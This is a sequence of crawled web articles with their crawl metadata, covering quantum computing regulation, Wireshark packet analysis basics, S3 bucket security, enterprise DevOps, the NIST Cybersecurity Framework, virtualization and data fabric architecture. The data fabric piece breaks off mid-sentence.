Quantum computing could be “more dangerous than artificial intelligence” if sufficient regulation is not put in place around the technology, a prominent academic has warned. However, with quantum machines already emerging from laboratories into the real world, it may be too late to effectively regulate its application. In an article in Foreign Policy Magazine, Stanford University law professor Mauritz Kop said it is vital to learn from the mistakes made around the regulation of AI “before it is too late” to control the impact of quantum machines. Kop is researching transformative technologies such as AI and quantum to understand the impact it will have on society and how it should be regulated. Governments are only now starting to tackle the issue of artificial intelligence regulation, with the technology’s use already widespread. The UK government this year revealed a framework that includes limiting biometric usage and requiring the publication of risk and mistake levels in data output. This follows multiple instances of bias found within AI applications used in public and private sector organisations. Significant benefits from quantum computing technology Quantum computers operate on a completely different basis from classical machines, with quantum qubits measured at multiple states rather than just ones and zeros of standard bits. This could allow for error-resistant and rapid solutions to incredibly complex mathematical problems. The multiple states mean quantum computers can increase exponentially with every new qubit added to the machine. Most quantum machines have between five and 20 qubits today with companies expecting 1,000 qubits within five years and a million within a decade. Indeed, it could take up to 15 years before quantum advantage, the point at which quantum computers can consistently outperform their classical counterparts, is achieved. It is hoped that as well as cracking existing cryptography, quantum technology will be used to create new materials without the need for prototyping, predict future climate change with greater accuracy and model new chemical combinations for drug treatments. Though a lot of funding is being pumped into the sector, today’s quantum computing start-ups are making long-shot bets that their chosen approach might define the next computing paradigm, argues Todd R. Weiss, an analyst who covers quantum computing for Futurum Research. “A lot of these ideas aren’t going to work,” he says. As such, the next decade will be a process of weeding out the bad ideas. “Quantum will start as a big funnel in terms of ideas and will converge and squish together into five or ten serious companies in five to ten years,” Weiss predicts. In his article, Professor Kop said that it is vital we have an understanding of the full potential impact of quantum now so it can be regulated and prevented from getting into the wrong hands before its too late to make any changes or stop irreparable damage from happening. He predicts that some will use the technology for illegal purposes including compromising bank records, hacking into private communications and being able to access the passwords of every computer in the world. Companies and government agencies are working to protect against this with the emergence of quantum cryptography, but this is also in its infancy. Quantum danger: every classical computer 'at risk' David Williams, founder of quantum cryptography company Arqit says that the solution isn't regulation but technology. He told Tech Monitor quantum technology is “already out of the bag” and beyond the reach of regulators internationally. Williams says that governments taking “a restrictive national approach to innovation and export control will merely harm domestic interests whilst more assertive countries like China storm ahead”. The biggest risk to the world from quantum computers could be its ability to quickly and easily crack existing cryptography, he believes. “Regulators therefore need a very open mind about what technologies they seek to deploy in protecting the data of Governments, enterprises and citizens," Williams says. “Relying on a small cohort of academics and public servants to decide what good looks like is also not an approach that has produced great innovation in recent decades – the best and brightest minds of global industry need to come together to solve this problem at scale.” Liz Parnell, COO Rackspace Technology told Tech Monitor the bigger risk is the fact that the technology is likely to be concentrated in a few small hands rather than be widespread and readily available like current classical computer. “How comfortable are we with that?,” she asks. She gives the example of a company like Amazon, which is investing heavily in quantum computing projects as well as controlling a large share of the retail sector and increasingly buying up health providers in the US. “Amazon knows everything about us and putting that data into quantum computers could allow them to make incredibly accurate predictions," Parnell says. “This technology could runaway from us so quickly and I don’t know many people who are having conversations about the ethics of this, intrinsic bias and how to protect people from misuse.” As quantum computing research ramps up, will regulation follow? Countries around the world are pouring money into quantum computing project or launching centres for quantum research to ensure they're not left behind in the race for quantum supremacy. Currently China and Europe are outpacing the rest of the world in terms of public funding for quantum computing efforts with China planning $15.3bn and the EU $7.2bn. In comparison the US has a $1.9bn planned budget and the UK $1.3bn according to a report by McKinsey. Kop writes that to avoid the ethical issues that have dogged AI and machine learning around misuse, transparency and bias, nations need to introduce controls that correspond to the power of quantum and respect democratic values, human rights and freedoms. The article states that "governments must urgently begin to think about regulations, standards and responsible uses". Mira Pijselman senior consultant at Ernst & Young wrote in an article for the company that business and technology leaders can't risk waiting for quantum technology to mature before enabling quantum ethics, agreeing with Kop in that it has to be done now before the technology is widespread. She wrote that “a successful transition to quantum will require existing cyber, data and AI governance capabilities to be expanded upon — but not replaced. Quantum technologies will magnify current organisational risks, with a particular focus on where quantum computing intersects with AI”.
<urn:uuid:3cc2d886-6fbb-4b0e-9e50-ee1d0f43ca78>
CC-MAIN-2022-40
https://techmonitor.ai/technology/emerging-technology/quantum-computing-regulation-ai
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00452.warc.gz
en
0.948411
1,293
3.03125
3
By Milica D. Djekic The internet packets are the sets of information being created and transmitted to carry on a message through the network’s communications. These packets may consist of many bytes and they would also get some details regarding the source and destination data as well as much more useful information describing the packet. One of the most convenient tools being used to a packet analysis today is a Wireshark offering many good functions and capabilities. This tool could get used for hacking as well as defense purposes. It takes only a few days of training to learn how to take advantage of that application. Through this article, we intend to discuss how such software could get used as well as provide a bit closer look at a smart packet analysis. Dealing with the hardware is from crucial importance because that part of the operation would define which segments of the packets could get captured and transmitted to an Sometimes the beginners may deal with the equipment so unskillfully and instead of capturing someone’s network’s traffic; they would simply capture their own network’s communications. The parts of the network receiving and sending the packets are called the routers and so commonly they would use the switches to make such a transmission more efficient. As we said – the most frequent software being used to packet analysis is a Wireshark. That tool is so simple to get applied and it may offer many advantages once you make a the decision to configure your network dealing with the internet traffic and sniffers being equipped with the software and physical gadgets. The Figure on the left would demonstrate how Wireshark capturing option appears. We would strongly encourage everyone being interested to learn more about this tool to take advantage of many web resources offering an opportunity to learn and explore everything you want to know about this software. One more thing being used in network communication is a protocol. The protocol is a set of rules that computers use to communicate with each other. The most typical protocols are TCP, UDP and IP. Dealing with the protocols is more like dealing with standard human communication. There would be some common rules – similarly as in the person – to – person communication. For instance, a good analogy could be – Person 1: “Hi! How are you?”; Person 2: “Good, thank you. Yourself?” and Person 1: “I am fine, thank you!” Practically, that’s how the protocols communicate with each other. It’s quite simple, convenient and clear! Many of Wireshark’s experts would suggest you have a look at how the packets of the information got transmitted. For instance, if you notice that some of the packets within that environment would indicate that it has done a re-transmission, it would not-doubly suggest that there must be some error with the sending and receiving options. On its way from a source to a destination – the packets may struggle to get delivered. Sometimes the routers as the devices in a communication network could cause concern. Please have a look at the Figure on our right and try to notice that the entire network would deal with the routers, users, links, and packets being sent and received. If you choose the physically appropriate locations to put your sniffers there, you would so easily get in a position to read that internet traffic. Finally, a described approach would seek some technology to get used as well as software in order to get your network traffic being monitored. As we said – this method could be helpful for monitoring purposes, while the Wireshark would most commonly get used to hacker’s operations as one of the network penetration’s testing tools. Anyway, all of those would include a defense purpose and require from such equipment to get applied smartly and effectively. Using some tools to a packet analysis may get quite interesting business to get done, so we would strongly recommend to everyone to try to play with these tools and test their capacities. About The Author Since Milica Djekic graduated at the Department of Control Engineering at the University of Belgrade, Serbia, she’s been an engineer with a passion for cryptography, cybersecurity, and wireless systems. Milica is a researcher from Subotica, Serbia. She also serves as a Reviewer at the Journal of Computer Sciences and Applications and. She writes for American and Asia-Pacific security magazines. She is a volunteer with the American corner of Subotica as well as a lecturer with the local engineering society.
<urn:uuid:2f913970-ea6a-4e1e-8a2d-82115f903d29>
CC-MAIN-2022-40
https://www.cyberdefensemagazine.com/the-packet-analysis/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00452.warc.gz
en
0.964438
945
3.1875
3
Understanding S3 Bucket Security – A Contextual Approach Friday, September 16, 2022 In 2017, 4 million records with customer information, login credentials, and source code were made publicly available due to 2 unsecured AWS S3 storage buckets owned by Time Warner Cable. The consequences of this attack were disastrous, and this event showed the entire cloud industry how important security is. In this article, we will learn more about Amazon S3 buckets, misconfigurations and vulnerabilities, and how to secure them. What is an Amazon S3 bucket? An Amazon S3 bucket is a storage cloud asset that acts as a container for data stored in the public cloud. Buckets are object storage services and are similar to folders; this type of storage is flexible and scalable and is ideal for large files and unstructured data. Common S3 Bucket Misconfigurations 1. Public access to a bucket is allowed. Sometimes, Amazon S3 buckets are required to be publicly accessible. For example, this use case occurs when the owner intends to make data accessible to the internet. However, breaches occur when a bucket that has sensitive information such as PII (Personal Identifiable Information) allows: - Public “READ” access, - Public “WRITE” access. You can grant and deny access to a bucket using access lists and bucket policies. An access control list (ACL) is a set of rules that limit access to buckets through permissions. It defines an account's access level over a bucket (for example, READ or WRITE). A bucket policy also contains rules based on which access is allowed or denied, but it is a more modern solution because it can enable more complex filtering. It is a JSON-based access policy language. Amazon recommends that you no longer use ACLs beside special cases, in which you need to filter access to objects individually. 2. No at rest encryption is performed. Data at rest should always be encrypted to ensure confidentiality and improve your cloud data security. Performing encryption on the objects inside a bucket ensures that, even if a malicious entity gains access to your data, they cannot read it. AWS provides multiple encryption options to protect data at rest. For example, you can enable default encryption and set it, so it automatically encrypts any new objects added to the bucket. Encryption should be done using industry-recommended algorithms and strong cryptographic keys. A strong encryption algorithm is AES-256 (Advanced Encryption Standard with a key of 256 bits). 3. In transit encryption is not enabled. Besides the data that is already stored, you should also encrypt the data that travels to and from the S3 bucket. This step prevents eavesdropping attacks. It is not enough to store your data encrypted. Your efforts are wasted if it travels in plain text and attackers can read it. Data in motion can be encrypted using SSL/TLS. TLS (Transport Layer Security) and SSL (Secure Sockets Layer) are transport layer protocols that protect the data in transit. TLS is a newer and improved version of SSL. Another solution for in motion encryption is preparing the data that is to be transported by encrypting it on the client-side. 4. Logging is disabled. Logging an S3 bucket is an essential step in securing your data. With logging, you can record actions taken by users, keep log files for compliance purposes and understand what roles have permission to access data inside a bucket. There are two solutions for AWS bucket logging: - Server access logging, and - AWS CloudTrail. With server access logging, you obtain detailed records regarding requests that are made to a bucket. AWS CloudTrail is a comprehensive service that tracks user activity and API calls. It can be used to keep a record of who sends requests to a bucket. It is important to keep in mind that AWS CloudTrail does not log failed authentication attempts through incorrect credentials. However, it does track requests made by anonymous or unauthorized users. 5. No regular backups are performed Attackers may not only try to steal your sensitive data, but they can also delete it. Therefore, ensuring regular and consistent backups is essential to configuring your buckets and providing availability. Using AWS Backup, you can perform S3 bucket backups. Amazon supports the following types of backups: - Continuous backups, which allow data restoration from any moment in the last 35 days, - Periodic backups, which can be performed every 1 hour, 12 hours, or less often. An important feature of AWS Backup is that tags, access control lists, and other metadata are also saved along with your data. An additional layer of security can be added by using the MFA delete feature in AWS. This option requires a successful MFA before allowing a user to delete an object or bucket. Moreover, you can keep multiple versions of an object inside a bucket. This process is called versioning and can be used to recover objects from accidental deletion. Do you have a complete cloud security program? In this article, we’ve discussed many possible misconfigurations, along with best practices. However, in order to fully understand your public cloud infrastructure and find vulnerabilities, you need to have good visibility over your cloud environment. Using a new feature in Cyscale, the bucket graph, you can put in context all of your knowledge and grasp a better understanding of your infrastructure. Below, you can see an example of a bucket graph. Although the bucket (shown on the right) has only two IAM policies attached, we can see that these have a significant impact on the infrastructure: the AmazonS3FullAccess policy gives full access rights to a specific user and to a VM that can assume an associated IAMRole. In addition, there's a lambda function that has a role which gives it permissions to perform actions on the bucket Without context, we would not be able to understand a policy's impact and the associated risk. Moreover, the icon on the right shows us that the bucket violates three policies. Cyscale users can click on the icon and obtain more details regarding this alert. This feature helps you quickly understand and fix any misconfigurations and vulnerabilities introduced in the cloud environment due to the bucket’s settings. Besides the graph, you can also use controls to check your cloud configurations easily. Find any gaps in your buckets' configurations using Cyscale controls! Here are a few examples that can help you instantly check the most common misconfigurations regarding S3 buckets: - Ensure S3 bucket ACL grants permissions only to specific AWS accounts - Ensure all S3 buckets employ encryption-at-rest - Ensure a log metric filter and alarm exist for S3 bucket policy changes - Ensure that there are no publicly accessible objects in storage buckets Build and maintain a strong Security Program from the start. Share this article Receive new blog posts and product updates from Cyscale
<urn:uuid:4a0b9af8-32a6-4174-989d-eb3c6013cdde>
CC-MAIN-2022-40
https://cyscale.com/blog/s3-bucket-security/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00452.warc.gz
en
0.921434
1,452
2.921875
3
DevOps is a set of practices that works to build collaboration among teams in order to develop, test, and roll out software more quickly and effectively. The concept of DevOps was originally developed in the context of agile web startups, and many question whether these practices can be applied to larger businesses and enterprises. The reality, however, is that while specific solutions might vary based on organizational size and demands, the basic principles of DevOps can be applied to and add value to organizations of all sizes. What is DevOps? To fully appreciate what DevOps is, it’s helpful to first focus on the division that has long existed in IT organizations between development teams and operations teams: - In a traditional model, development teams are responsible for creating and changing software. They are primarily focused on innovation, new products, and new features. - In contrast, operations teams are focused on system stability and accessibility. Their focus is more service-oriented, and they work to guarantee that systems are stable and consistently working effectively. At their core, the teams seem to represent two competing interests, as one team works to consistently deliver software changes while the other works to maintain availability and function. In a traditional model, the two departments are separate with organizations consistently having to choose between them. DevOps, on the other hand, get away from this divided, silo mentality. DevOps instead focuses on collaboration and shared values across teams. The basic goal of DevOps is maximizing the development-to-operations value stream and ensuring an efficient flow of changes from development to operations. The specific solutions organizations use to meet this goal vary, but often include: In addition, the DevOps model generally involves shared values across teams, including more frequent releases of new software and software changes, an increased emphasis on automation, and a sense of shared responsibility. While DevOps looks different from organization to organization, at its core it’s culture, tools, and practices that work to bring teams, individuals, processes, and products together in order to develop and roll out software faster and more effectively. Does DevOps work for enterprises? DevOps is often associated with small and agile organizations, and many of the traditional tools associated with DevOps are geared towards these types of organizations. And, the truth is that many of those tools and practices are not applicable to large enterprises with big teams, operational complexity, and lots of internal and external regulation. Making the shifts to DevOps even more difficult is the reality that enterprises generally have to deal with change control processes, release teams and approval gates, large environments, and a lot of teams and groups. All of these factors can make it challenging for enterprises to move to a DevOps model. Despite these very real concerns, DevOps practices can work effectively for businesses of all sizes. While the specific solutions will look different based on the size of the organization, the basic principle of collaboration between development and operations teams to lead to better outcomes can be effectively scaled. Not only is DevOps possible for enterprises, but in the current environment, it’s a necessary shift for many organizations to support ongoing digital transformation, organizational growth, and increased capabilities. How do you make DevOps effective at enterprise scale? While making the shift to DevOps is important for staying competitive and meeting customer demands, implementing these practices on an enterprise scale is hard and requires some major shifts in the way teams plan, build, test, release, and manage software. For many organizations, the shift can feel overwhelming, but here are some things to help make this transition smooth and successful. Don’t Ignore or Replace What Works Most enterprises have already spent a substantial amount of time, money, and energy developing software and systems that work. When making the shift to DevOps and promoting an increased focus on continuous development and change, it can be tempting to always focus on what’s new and what’s next. However, doing so can be incredibly inefficient and ignores what’s already working well while meeting the organization’s needs. Instead of overlooking or replacing what’s working, build upon what’s working. Organizations that are able to do this effectively are able to reduce risks, costs, and the all-important time-to-value metric. Prioritize Building Confidence Across the Organization A shift to DevOps can leave many across the organization concerned about unnecessary risks and potential negative impacts on customers. Ultimately, however, this shift is aimed at enabling enterprises to continue to be competitive and innovative without being held back by concerns about undue risks. To effectively and comfortably make this shift, teams need to prioritize consistency, quality, and security from the very beginning. Addressing and preventing problems before they arise can help to make this organizational shift as seamless as possible. Further, ensuring that quality and consistency are always at the center of this change can help to build confidence throughout the organization, ensuring a successful transition. Identify and Deliver the Right Outputs It’s always important for IT organizations to focus on the right outputs. Many times outputs are centered around finishing a project or a product when instead they should be focused on targeted and measurable business outcomes. When it comes to DevOps, generally the outputs should be focused on the benefits that customers receive. From the start of any project, it’s important for teams to understand customer needs thoroughly and to identify the specific need that is being addressed with a project or product. To ensure that teams stay on track to meet these goals, it’s necessary to consistently revisit these objectives and evaluate the progress towards them, which often includes course corrections. Implementing a continuous feedback system is an ideal way to ensure that all teams are on track to deliver the right outputs. However, regardless of the system that your team uses, it’s essential to focus consistently on identifying and delivering the right outputs. Limit Operational Friction DevOps aim to have a quick flow of changes across development and operations teams to stay competitive and meet customer demands. Doing this effectively means working efficiently across teams and throughout the organization. Eliminating any operational friction that will interfere with this objective makes it easier for teams to meet demands, increase automation, and develop organization-wide systems. As a result, proactively reducing operational friction among everything from teams to departments to vendors will help enable an effective transition to a DevOps model. As discussed, the shift to DevOps is not easy, especially for large organizations. One way to ensure that the transition is successful is to share progress regularly. This sharing of information doesn’t have to be formal and can be as simple as regular status updates. However, it’s important for there to be visible progress and results seen throughout the organization. To meet this need, consistent progress sharing is essential. Many large organizations have successfully made the transition to DevOps practices, serving as proof points that this concept is applicable and effective for enterprises. While the shift might not be an easy one, it’s an important change to make, ensuring that organizations stay competitive while timely meeting customer needs. Being strategic about making this shift and proactively planning for its success can make this transition smoother and easier. For more on DevOps, explore these resources: - BMC DevOps Blog - DevOps Guide, with 25+ articles on tips, best practices, and more - The State of DevOps in 2020 - What Is Cloud Native DevOps? - An Integrated DevOps Strategy for the Autonomous Digital Enterprise
<urn:uuid:733060c2-52a1-44ac-866c-ba8444d52466>
CC-MAIN-2022-40
https://www.bmc.com/blogs/devops-enterprises/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00452.warc.gz
en
0.947216
1,543
2.921875
3
What Are NIST Security Standards? Businesses today find themselves asking, “What are NIST security standards and how can they be applicable to them?” This should not come as any great surprise—we are currently experiencing a dramatic shift in attitudes towards the threat of cybercrime and there’s a growing recognition among organizations that security standards in network security are not just an important aspect of a modern company, but actually vital to its survival. Prior to the pandemic, companies by their own admission were unprepared for cyberattacks, with just 23% of organizations indicating they had an incident response plan applied across their business, according to IBM. Many companies are simply not ready for the number and severity of modern cyberattacks, and this is no small matter—93% of companies without a disaster recovery plan who suffer a major data disaster go out of business within one year. Because of the pandemic and the changes it brought, cyberattacks are currently at higher levels than ever, and businesses must respond in order to protect themselves and their customers. This is where frameworks like NIST come in—companies are looking for guidance on their cybersecurity and hope that standards like NIST can provide it. In this blog, we’re going to take a look at what NIST security standards are, break it down, and determine how applicable it is to organizations across the country that want to shore up their business security. What Is NIST? The National Bureau of Standards, as it was known until 1988, was founded in 1901 as a non-regulatory agency to provide standards across a range of industries, including manufacturing, environmental science, public safety, nanotechnology, information technology, and more. Over the years since its founding, the remit of NIST has extended over a growing number of industries, of which cybersecurity (under IT) is just one. NIST frameworks, including its cybersecurity framework, are intended to be voluntary guidelines for all organizations except those engaging with government contracts, which are required to abide by them. What Is the NIST Cybersecurity Framework (CSF)? The NIST Cybersecurity Framework, or CSF for short, was established by executive order in 2013 under President Obama in order to create a framework consensus for approaching cybersecurity with the intention of reducing risk to critical government and public infrastructure systems. The first version of the CSF was published in 2014, and Congress passed the Cybersecurity Enhancement Act of 2014 shortly thereafter with the following stated purpose: AN ACT To provide for an ongoing, voluntary public-private partnership to improve cybersecurity, and to strengthen cybersecurity research and development, workforce development and education, and public awareness and preparedness, and for other purposes. Another executive order was issued by President Trump in 2017, directing all federal agencies to use the framework. In 2015, an estimated 30% of US businesses used the CSF, with a further rise to 50% in 2020. The success of the framework has led to it being adopted not just in the United States, but across the world, from the United Kingdom to Israel. NIST Framework Summary So, what are NIST security standards? The NIST Cybersecurity Framework is broken down into three distinct components: the “Core”, “Implementation Tiers”, and “Profiles”. The Framework Core is the set of activities that are designed to achieve the best cybersecurity outcomes desired by NIST standards. These activities are not a checklist, but rather key outcomes identified by stakeholders as significant in managing cybersecurity risk. What Are Elements NIST Security Standards? There are four key elements that make up the Framework Core. These are: - Functions: Functions are some of the most recognizable aspects of the NIST cybersecurity framework. They outline the basic security activities from a high-level perspective and help organizations address the most crucial elements of cybersecurity. The Functions include Identify, Protect, Detect, Respond, and Recover. - Categories: The Categories are focused on business outcomes and are slightly more in-depth, covering objectives within the core functions. - Subcategories: Subcategories are the most granular level of abstraction in the Core. There are a total of 108 subcategories, which are typically outcome-driven and designed to provide considerations for establishing or improving a cybersecurity program. - Informative References: Informative references refers to existing standards, guidelines, and practices relevant to each subcategory. NIST Categories of the Five Key Functions of the Cybersecurity Framework As we noted, each of the key Functions are broken down into NIST Categories and NIST Subcategories. The NIST Categories are as follows: - Asset Management - Business Environment - Risk Assessment - Risk Management Strategy - Supply Chain Risk Management Related Post: What Happens During a Cybersecurity Risk Audit? - Identity Management and Access Control - Awareness and Training - Data Security - Information Protection Processes & Procedures - Protective Technology - Anomalies and Events - Security Continuous Monitoring - Detection Processes - Response Planning - Recovery Planning The Framework Implementation Tiers are to help illustrate the extent to which an organization is able to effectively meet the characteristics outlined in the Framework Functions and Categories. These Implementation Tiers are not considered to be levels of cybersecurity maturity and not intended to be. However, organizations that meet the standards for the highest tiers will inevitably have many of the characteristics that define cyber-mature companies. Tier 1 (Partial) Risk Management Process: Risk management practices are not formalized and risk is managed in an ad hoc fashion. Integrated Risk Management Program: Limited awareness of cybersecurity risk at the organizational level. External Participation: Organization doesn’t collaborate with other entities or understand its role in the larger ecosystem. Tier 2 (Risk Informed) Risk Management Process: Risk management practices are approved by management and prioritized according to organizational risk objectives. Integrated Risk Management Program: Awareness of cybersecurity risk at the organizational level, but lacking a company-wide approach to managing this risk. External Participation: The organization recognizes its role in the business ecosystem with respect to its dependencies or dependents, but not both. Some collaboration, but may not act consistently or formally on risks presented. Tier 3 (Repeatable) Risk Management Process: Risk management practices are formally approved and expressed through policy. Cybersecurity practices are regularly updated based on the application of the formal risk management process. Integrated Risk Management Program: Organization-wide approach to security risk management in place, and personnel possess the knowledge and skills to manage security risks. External Participation: The organization’s role in the larger ecosystem is understood as it pertains to other companies and it may contribute to the community’s broader understanding of risks. Collaborates with and receives information from others regularly. Tier 4 (Adaptive) Risk Management Process: Cybersecurity practices are adapted and developed based on previous and current activities, as well as predictive indicators. Continuous improvement of processes through the incorporation of advanced technologies and practices is expected. Integrated Risk Management Program: The relationship between security risk and organizational objectives is understood clearly. Security risk management is part of the organizational culture and changes to how risk management is approached is communicated quickly and effectively. External Participation: Organization fully understands its role in the larger ecosystem and contributes to the community’s understanding of risks. Receives, generates, and prioritizes information that informs constant analysis of risks. Real-time data analysis is leveraged, and communication is proactive as it pertains to risks associated with the products and services used. The Framework Profile refers to the overall alignment of Functions, Categories, and Subcategories with the organization’s business requirements, risk tolerance, and resources. Because different businesses have different priorities, no two profiles will be the same, and so determining the unique Framework Profile that best fits the company is the final key aspect of the NIST standards. Current Profile vs. Target Profile When businesses establish profiles for cybersecurity standards, a common and effective way of understanding where they are and where they want to be is to create two profiles: the current profile and the target profile. The current profile is created by assessing the organization’s ability to carry out subcategory activities. Examples of subcategories include things like, “Physical devices and systems within the organization are inventoried” (ID.AM-1), and, “Data-in-transit is protected” (PR.DS-2)”. These are just two examples of the 108 total Subcategories, but give an indication of the kinds of activities that are assessed. Once the current profile has been established by ranking the company’s ability to fulfill each subcategory, it is then time to create the target profile. The target profile is effectively where the company should be with its cybersecurity in order to meet the desired risk management goals and priorities. Once the target profile has been created, the organization can then compare the two and get a clear understanding of where the business meets their risk management goals and where improvements need to be made. This is one of the most effective ways to understand fully what NIST security standards are and how directly applicable they are to an organization in terms of improving their protocols and getting compliant with NIST’s CSF recommendations. Who Uses the NIST Cybersecurity Framework? As we’ve noted, NIST is designed first and foremost as a framework aimed at those companies in the federal supply chain, whether it’s prime contractors, subcontractors, or another entity required to be compliant with NIST. NIST’s standards, however, are applicable to virtually any business and an extremely valuable source for determining a company’s current cybersecurity activities and their ability to carry them out to an acceptable standard—in addition to uncovering new and unknown priorities. The ultimate goal of NIST is to provide a framework not just for federally associated organizations, but for the business world at large. To this end, NIST plans to continually update the cybersecurity framework to keep it fresh and applicable to anyone, whether they specifically need NIST CSF compliance or not. We hope this blog post has helped you get an understanding of what NIST security standards are and how they are used in organizations. While NIST CSF compliance is not necessary for organizations not contracted by the government or subcontracted by a government contractor, many of its activities and protocols apply to many other compliance regulations that must be followed, like HIPAA, PCI, PII. For compliance with these regulations (and many others), it is suggested to use a governance risk and compliance (GRC) solution so that activities can be accurately monitored and maintained. At Impact, we offer such a solution, with options for hybrid or full management of GRC from our experts, who will perform and risk assessment and make sure that your cybersecurity policies are exactly where they need to be to remain compliant. For more information, take a look at our Compliance Services page and connect with a specialist to see how Impact can get your organization’s compliance on track today.
<urn:uuid:175a3d6b-2b31-4a19-bd34-0db7c8835832>
CC-MAIN-2022-40
https://www.impactmybiz.com/blog/what-are-nist-security-standards/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00652.warc.gz
en
0.940498
2,358
3
3
Database mirroring is a relational database management (RDMS) technique to maintain consistent data in spite of high availability needs by creating redundant copies of a dataset. What do I need to know about database mirroring? A database mirror is a complete backup of the database that can be used if the primary database fails. Transactions and changes to the primary database are transferred directly to the mirror and processed immediately so the mirror is always up-to-date and available as a “hot” standby. Who uses database mirroring? Database mirroring is a form of data replication. While all transactional systems require some form of data replication in order to prevent loss and maintain high availability, not all databases use mirroring. Among commercial RDBMS systems, Microsoft SQL Server is notable for its use of database mirroring. What are the benefits of database mirroring? Thanks to automatic failover, database mirroring facilitates high availability of data systems and the applications that use them. It also provides transactional consistency so that the data is always up-to-date and consistent.
<urn:uuid:4591b8c4-fa2e-491d-af11-b8d6fe81a2fd>
CC-MAIN-2022-40
https://www.informatica.com/au/services-and-training/glossary-of-terms/database-mirroring-definition.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00652.warc.gz
en
0.887636
220
3.203125
3
Virtualization can play a Pivotal Role in Expansion of Businesses First off what is Virtualization? As noted by Wikipedia “Hardware virtualization or platform virtualization refers to the creation of a virtual machine that acts like a real computer with an operating system. Software executed on these virtual machines is separated from the underlying hardware resources. For example, a computer that is running Microsoft Windows may host a virtual machine that looks like a computer with the Ubuntu Linux operating system; Ubuntu-based software can be run on the virtual machine. "With virtualization admins now have a much faster infrastructure for passing data and communications since all servers OS reside on one piece of hardware instead of many across the network. " In hardware virtualization, the host machine is the actual machine on which the virtualization takes place, and the guest machine is the virtual machine. The words host and guest are used to distinguish the software that runs on the physical machine from the software that runs on the virtual machine. The software or firmware that creates a virtual machine on the host hardware is called a hypervisor or Virtual Machine Manager.”. So what does that mean for your business? There are many benefits to Virtualization. • Virtualization can greatly help a business by cutting down on hardware costs. All businesses are cost conscious and server virtualization can give a business small or large the opportunity to run their own software and security in-house instead of out sourcing everything to the “cloud”. The cloud is wonderful when needed; however, not all businesses need the cloud. Have you heard the statement “if you own your equipment, you own your data”? The cloud also has long term costs. You have to keep paying for the cloud. With server visualization you can purchase the hardware and OS (Operating System) and pay it off right away. This is optimal for many companies who do not want to be paying for cloud services for months and years to come. • Virtualization is great for system admins. With virtualization admins will have a much faster infrastructure for passing data and communications since all servers OS reside on one piece of hardware instead of many across the network. You can also move servers from one virtual server to another or to another piece of hardware since the virtualized OS basically a data file making it easy to move around and upgrade the server OS. Admins can also manage the resources on the fly. A server does not have enough drive space, just expand it! The server with your accounting software on it is using up to much memory, just add more memory! This can all be done at a click of a mouse allowing a company to grow and expand easily. • Old software applications can still be used! Do you or your client have an old software application that they don’t want to part with, but it can only run on an out dated OS? With virtualization you can image that old server no matter what OS it is and put in in a virtual environment. Now it’s running off of brand new hardware and you can secure the old OS to allow it to still run the application, but not cause security issues on your network. So are you ready to make the next step to virtualization? How do you start? Start with a plan. Make sure you have a network diagram of all your current and even potential future applications, software, hardware, IT needs in general. For example are you thinking about having an on-site Exchange Server if so you need to plan for that and if you end up not setting up an on-site Exchange Server; you will just have more resources for your other virtualized OS. • AD 1 • AD 2 • Exchange Server • Accounting Software • File Server • Terminal Server Then you decide on your OS. Windows Server 2012 Data Center which allows for unlimited VM’s, Server 2012 R2 Standard which allows for 2 VM’s or maybe VM Ware vCloud Suite Enterprise. Whatever your choice you need to make sure you know how many virtual server you need. After the OS. You need to start thinking about hardware. Based on the number of virtual servers you will be spinning up and the applications on those servers you will decide on the following: CPU and RAM (Memory) Storage (Hard Drive) Size and type. Sata, SSD, Nic cards. Two? 1GB? 10GB? So what are the requirements of your virtual servers? The OS needs so much CPU, HD and through put. So does each software/application going on to your servers. And finally remember to take into account what the servers are being used for. Website? Will it be connected to the internet? Will a marketing department be using the server, therefore, having to transfer a large amount of images around the network?Once all is planned out you can spin up your new hardware and servers. The world of virtualization is all yours. Just remember backup, backup and backup!
<urn:uuid:c99dbbd3-ec6b-46dd-86f3-ee7042ebd058>
CC-MAIN-2022-40
https://virtualization.cioreview.com/cioviewpoint/virtualization-can-play-a-pivotal-role-in-expansion-of-businesses-nid-13073-cid-86.html?utm_source=clicktrack&utm_medium=hyperlink&utm_campaign=linkinnews
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00652.warc.gz
en
0.924845
1,026
2.8125
3
Enterprises are producing a staggering amount of data every day. Disparate data sources, lack of access, and complex data integration challenges can prevent organizations from fully utilizing data they collect. As data continues to grow, these issues compound. A data fabric helps organizations overcome these challenges. What Is a Data Fabric? A data fabric is an integrated architecture that leverages data to provide a consistent capability across endpoints spanning a hybrid multi-cloud environment. By creating standardized practices for data management, a data fabric creates greater visibility, access, and control. Most importantly, it creates a consistency that allows data to be used and shared anywhere within your environment. Data is combined from different sources and types, to create a comprehensive single, virtual source. Regardless of the application, platform, or storage location, a data fabric architecture facilitates frictionless access and data sharing across a distributed infrastructure. Data fabric architecture simplifies analysis, especially for use with AI and machine learning, and has become a primary tool for many organizations to convert raw data into usable business intelligence. Gartner picked data fabric as its top strategic technology trend for 2022, noting that a data fabric can reduce data management efforts by as much as 70%. What’s the Difference Between a Data Fabric, Data Warehouse, and Data Lake? To understand the difference between a data fabric architecture and data warehouses or data lakes, it’s important to understand how data storage has evolved. Data warehouses are great for storing structured data and providing data in an aggregated, summary form for data analysis. However, it doesn’t work with unstructured data, which represents the majority of data collected. One of the reasons so much data goes unused is that 80% to 90% of the data collected is unstructured and doesn’t adhere to conventional data models. Data lakes made handling all types of data easier — including both structured and unstructured data —even co-locating data from disparate sources. Data lakes store and maintain replicas of the data, but do not support real-time data and can result in slow response times for some queries. Data lakes can also become a dumping ground for data (a so-called “data swamp”) with data that’s unusable. This can limit effective analysis. A data fabric overcomes these obstacles by creating unified access to processed data while maintaining localized or distributed 